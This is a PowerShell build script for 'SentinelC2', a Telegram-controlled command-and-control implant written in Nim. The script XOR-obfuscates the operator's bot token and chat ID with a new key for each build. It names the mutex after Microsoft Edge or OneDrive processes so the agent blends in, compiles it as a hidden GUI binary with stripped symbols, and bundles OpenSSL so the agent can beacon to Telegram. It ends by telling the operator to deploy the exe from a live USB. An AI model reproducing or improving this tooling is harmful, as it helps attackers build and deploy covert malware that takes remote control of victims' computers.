# =============================================================================
# build_telegram.ps1 - Compile the Telegram-C2 variant of SentinelC2
#
# Workflow:
#   1. Generate a fresh 16-byte XOR key (per build) for string obfuscation
#   2. Encode the operator's bot token + chat id with that key
#   3. Optionally generate a randomized mutex name
#   4. Inject the encoded byte arrays into agent_telegram.nim
#   5. Compile with the same flags as the main SentinelC2 baseline
#   6. Clean up all generated files so they don't get committed
#
# Usage:
#   .\build_telegram.ps1
#       -BotToken "123456:AAH-..." `
#       -ChatId   "-1001234567890" `
#       -Output   "build\agent_telegram.exe" `
#       [-MutexSeed "0xDEADBEEF"]   # random if omitted
#
# Reads from env if flags omitted:
#   $env:TG_BOT_TOKEN
#   $env:TG_CHAT_ID
#
# Override nim path with $env:NIM
# =============================================================================

param(
    [string]$BotToken = $env:TG_BOT_TOKEN,
    [string]$ChatId   = $env:TG_CHAT_ID,
    [string]$Output   = $null,
    [string]$MutexSeed,
    [switch]$NoUpx
)

$ErrorActionPreference = "Stop"
$ProjectDir = $PSScriptRoot
$SrcDir     = $ProjectDir
$BuildDir   = Join-Path $ProjectDir "build"
$CacheDir   = Join-Path $ProjectDir "build_cache"
$Nim        = if ($env:NIM) { $env:NIM } else { "nim" }

if (-not $Output) {
    $Output = Join-Path $BuildDir "agent_telegram.exe"
}

if (-not $BotToken -or $BotToken -notmatch ':') {
    throw "Missing -BotToken (or `$env:TG_BOT_TOKEN)."
}
if (-not $ChatId) {
    throw "Missing -ChatId (or `$env:TG_CHAT_ID)."
}

# -----------------------------------------------------------------
# Verify nim
# -----------------------------------------------------------------
if (-not (Get-Command $Nim -ErrorAction SilentlyContinue)) {
    if (-not (Test-Path $Nim)) {
        throw "nim not found. Set `$env:NIM or add nim to PATH."
    }
}

# -----------------------------------------------------------------
# 1. Generate a fresh 16-byte XOR key
# -----------------------------------------------------------------
function New-XorKeyNim {
    param([string]$OutPath)
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $bytes = New-Object byte[] 16
    $rng.GetBytes($bytes)
    $hexParts = @()
    foreach ($b in $bytes) { $hexParts += ("0x{0:x2}" -f $b) }
    $keyBody = $hexParts -join ", "
    # CRITICAL: write as UTF-8 WITHOUT a BOM. Nim's parser treats a BOM
    # at the start of an included file as part of the file, which makes
    # the `const XorKey: ...` declaration unparseable, the include
    # silently no-ops, the staticExec check then matches the fallback
    # branch, and the binary uses the fallback key while the encoded
    # bytes were XOR'd with the per-build key — every decoded value
    # is garbage and the agent crashes with IndexDefect at startup.
    # PowerShell 5.1's Set-Content -Encoding UTF8 writes a BOM by
    # default, so we use UTF8NoBOM (PS 6+) or write bytes directly.
    $content = "# Auto-generated per-build XOR key. Do NOT edit.`n" +
               "# This file is regenerated by build_telegram.ps1 before each compile.`n" +
               "const XorKey: array[16, byte] = [byte $keyBody]`n"
    if (Get-Command -Name "Set-Content" -ErrorAction SilentlyContinue |
        Get-Member -Name "Parameters" -ErrorAction SilentlyContinue |
        Where-Object { $_.Parameters.Keys -contains "Encoding" } |
        ForEach-Object { $_.Parameters["Encoding"].Attributes |
                         Where-Object { $_.ValidValues -contains "utf8NoBOM" } }) {
        Set-Content -Path $OutPath -Value $content -Encoding utf8NoBOM -NoNewline
    } else {
        # PS 5.1 fallback: write raw bytes to avoid the BOM
        [System.IO.File]::WriteAllText($OutPath, $content, (New-Object System.Text.UTF8Encoding($false)))
    }
}

# -----------------------------------------------------------------
# 2. Encode a string with the per-build XOR key -> Nim byte array
# -----------------------------------------------------------------
function Format-EncodedBytes {
    param([string]$Plaintext, [string]$XorKeyPath)
    $hex = (Get-Content $XorKeyPath -Raw) -replace "`r?`n", ""
    # Extract the byte values from the XorKey definition
    $matches = [regex]::Matches($hex, '0x([0-9a-fA-F]{2})')
    $key = @()
    foreach ($m in $matches) { $key += [byte]([Convert]::ToInt32($m.Groups[1].Value, 16)) }
    if ($key.Count -ne 16) { throw "XorKey has $($key.Count) bytes, expected 16" }

    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Plaintext)
    $out = New-Object System.Collections.Generic.List[byte]
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $out.Add([byte]($bytes[$i] -bxor $key[$i % 16]))
    }
    # Format as: [byte 0xNN, 0xNN, ...]
    $parts = @()
    for ($i = 0; $i -lt $out.Count; $i++) {
        if ($i -eq 0) { $parts += ("0x{0:x2}" -f $out[$i]) }
        else          { $parts += ("0x{0:x2}" -f $out[$i]) }
    }
    return "[" + (($parts | ForEach-Object { "byte $_" }) -join ", ") + "]"
}

# -----------------------------------------------------------------
# 3. Build a randomized mutex name from a seed
# -----------------------------------------------------------------
function New-MutexName {
    param([string]$Seed)
    if (-not $Seed -or $Seed -eq "0") {
        return "Global\MicrosoftEdgeUpdateTaskRuntime"
    }
    # FNV-1a 32-bit hash of the seed -> 6 hex chars.
    # PowerShell auto-promotes uint32 multiplications to double, so we
    # do the math in [int64] and mask back to 32 bits at the end.
    $h = 0L
    foreach ($ch in $Seed.ToCharArray()) {
        $h = (($h * 0x01000193L) -bxor [int64][int]$ch) -band 0xFFFFFFFFL
    }
    $suffix = ("{0:x6}" -f $h)
    return "Global\OneDriveSync$suffix"
}

# -----------------------------------------------------------------
# 4. Inject the encoded token / chat / mutex into the source
# -----------------------------------------------------------------
function Replace-Placeholder {
    # Replaces a placeholder const line, preserving the original
    # leading whitespace. The placeholder sits inside a Nim `const`
    # block, so the line is just `  S_NAME = [byte 0x00] ...`
    # (no `const` keyword on that line).
    param(
        [string]$Source,
        [string]$Name,
        [string]$Encoded
    )
    $pattern = "(?m)^(?<indent>\s*)(?<n>$([regex]::Escape($Name)))\s*=\s*\[byte\s+0x00\]\s*#\s*placeholder\s*-\s*replaced\s*at\s*build\s*time"
    $regex = [regex]$pattern
    $result = $regex.Replace($Source, {
        param($m)
        $m.Groups["indent"].Value + $m.Groups["n"].Value + " = " + $Encoded
    })
    return $result
}

function Inject-Secrets {
    param(
        [string]$SourcePath,
        [string]$BotToken,
        [string]$ChatId,
        [string]$MutexName,
        [string]$XorKeyPath
    )
    $tokenBytes = Format-EncodedBytes -Plaintext $BotToken -XorKeyPath $XorKeyPath
    $chatBytes  = Format-EncodedBytes -Plaintext $ChatId   -XorKeyPath $XorKeyPath
    $mutexBytes = Format-EncodedBytes -Plaintext $MutexName -XorKeyPath $XorKeyPath

    $src = Get-Content $SourcePath -Raw
    # Use a regex callback to preserve leading whitespace.
    $src = Replace-Placeholder -Source $src -Name "S_BOT_TOKEN" -Encoded $tokenBytes
    $src = Replace-Placeholder -Source $src -Name "S_CHAT_ID"   -Encoded $chatBytes
    $src = Replace-Placeholder -Source $src -Name "S_MUTEX"     -Encoded $mutexBytes

    $built = Join-Path $SrcDir "agent_telegram_built.nim"
    [System.IO.File]::WriteAllText($built, $src, (New-Object System.Text.UTF8Encoding($false)))
    return $built
}

# -----------------------------------------------------------------
# Run
# -----------------------------------------------------------------
if (Test-Path $BuildDir) { Remove-Item -Recurse -Force $BuildDir }
New-Item -ItemType Directory -Path $BuildDir | Out-Null

# Random mutex seed if not provided (so the mutex is unique per build)
if (-not $MutexSeed) {
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $seedBytes = New-Object byte[] 4
    $rng.GetBytes($seedBytes)
    $MutexSeed = "0x" + (($seedBytes | ForEach-Object { "{0:x2}" -f $_ }) -join "")
}

$XorKeyPath = Join-Path $SrcDir "xorkey.nim"
New-XorKeyNim -OutPath $XorKeyPath
$MutexName = New-MutexName -Seed $MutexSeed
Write-Host "[*] mutex seed: $MutexSeed  ->  $MutexName" -ForegroundColor Cyan

$BuiltSource = Inject-Secrets `
    -SourcePath (Join-Path $SrcDir "agent_telegram.nim") `
    -BotToken   $BotToken `
    -ChatId     $ChatId `
    -MutexName  $MutexName `
    -XorKeyPath $XorKeyPath

$Flags = @(
    "c",
    "-d:release",
    "-d:ssl",
    "--opt:size",
    "--app:gui",
    "--passL:-s",
    "--debugger:native",
    "--lineTrace:on",
    "--stackTrace:on",
    "--threads:on",
    "--threadAnalysis:off",
    "--nimcache:$CacheDir",
    "--out:$Output",
    $BuiltSource
)
Write-Host "[*] Compiling agent_telegram..." -ForegroundColor Cyan
$argLine = ($Flags | ForEach-Object { if ($_ -match '\s') { '"' + $_ + '"' } else { $_ } }) -join ' '
$logPath = Join-Path $BuildDir "build.log"
# CRITICAL: change CWD to $SrcDir before invoking nim. The source uses
# `include "xorkey.nim"` to pull in the per-build XOR key, and Nim's
# include search starts in the source file's directory. The compiled
# `xorkey.nim` lives at $SrcDir\xorkey.nim. Without the push, if the
# user invoked the script from the project root, the include would
# silently fall back to a hardcoded key while the encoded bytes were
# XOR'd with the per-build key, and the agent would crash at startup
# with an opaque IndexDefect (all decoded secrets are garbage).
#
# Also resolve --out to an absolute path BEFORE the push, because a
# relative --out gets re-resolved against the new CWD and ends up at
# e.g. telegram\telegram\build\foo.exe.
$outParent = Split-Path -Parent $Output
if (-not (Test-Path $outParent)) {
    New-Item -ItemType Directory -Path $outParent -Force | Out-Null
}
$outParentAbs = (Resolve-Path -LiteralPath $outParent).Path
$AbsOut = Join-Path $outParentAbs (Split-Path -Leaf $Output)
$newFlags = @()
for ($i = 0; $i -lt $Flags.Count; $i++) {
    if ($Flags[$i] -like '--out:*') {
        $newFlags += "--out:$AbsOut"
    } else {
        $newFlags += $Flags[$i]
    }
}
$argLine = ($newFlags | ForEach-Object { if ($_ -match '\s') { '"' + $_ + '"' } else { $_ } }) -join ' '
Push-Location -Path $SrcDir
try {
    cmd.exe /c ('"' + $Nim + '" ' + $argLine + ' > "' + $logPath + '" 2>&1') | Out-Null
} finally {
    Pop-Location
}
$compileOk = ($LASTEXITCODE -eq 0)
if (-not $compileOk) {
    Get-Content $logPath | Select-Object -Last 30 | ForEach-Object { Write-Host "  $_" }
    Write-Host "  built source kept at: $BuiltSource" -ForegroundColor Yellow
    # NOTE: leaving built source + xor key on disk for inspection.
    # On a successful build we clean them up below.
}

# Cleanup is conditional so a failed build leaves artifacts for diagnosis
if ($compileOk) {
    if (Test-Path $BuiltSource) { Remove-Item -Force $BuiltSource }
    if (Test-Path $XorKeyPath)  { Remove-Item -Force $XorKeyPath }
    # Bundle the OpenSSL DLLs that Nim statically references when
    # -d:ssl is set. Without these next to the .exe, the agent
    # cannot make HTTPS calls and silently fails on every poll
    # (Telegram API is HTTPS-only). Nim ships them in its bin dir.
    $NimDir = Split-Path -Parent (Get-Command $Nim | Select-Object -ExpandProperty Source)
    $OpenSslFiles = @("libssl-1_1-x64.dll", "libcrypto-1_1-x64.dll")
    foreach ($dll in $OpenSslFiles) {
        $src = Join-Path $NimDir $dll
        $dst = Join-Path (Split-Path $Output -Parent) $dll
        if (Test-Path $src) {
            Copy-Item -Path $src -Destination $dst -Force
            Write-Host "    + $dll" -ForegroundColor DarkGray
        } else {
            Write-Warning "  OpenSSL DLL not found: $src  (agent will fail at runtime)"
        }
    }
}
if (-not $compileOk) { exit 1 }

# -----------------------------------------------------------------
# Summary
# -----------------------------------------------------------------
$sizeKb = [math]::Round((Get-Item $Output).Length / 1024, 1)
Write-Host ""
Write-Host "[+] Built: $Output  ($sizeKb KB)" -ForegroundColor Green
Write-Host "[+] Token fingerprint:  $($BotToken.Substring(0, [Math]::Min(8, $BotToken.Length)))...$($BotToken.Substring([Math]::Max(0, $BotToken.Length - 6)))"
Write-Host "[+] Chat id:            $ChatId"
Write-Host "[+] Mutex:              $MutexName"
Write-Host "[+] Mutex seed (save):  $MutexSeed"
Write-Host ""
Write-Host "[+] Drop this exe on your live Linux USB and run deploy_telegram.sh" -ForegroundColor Green
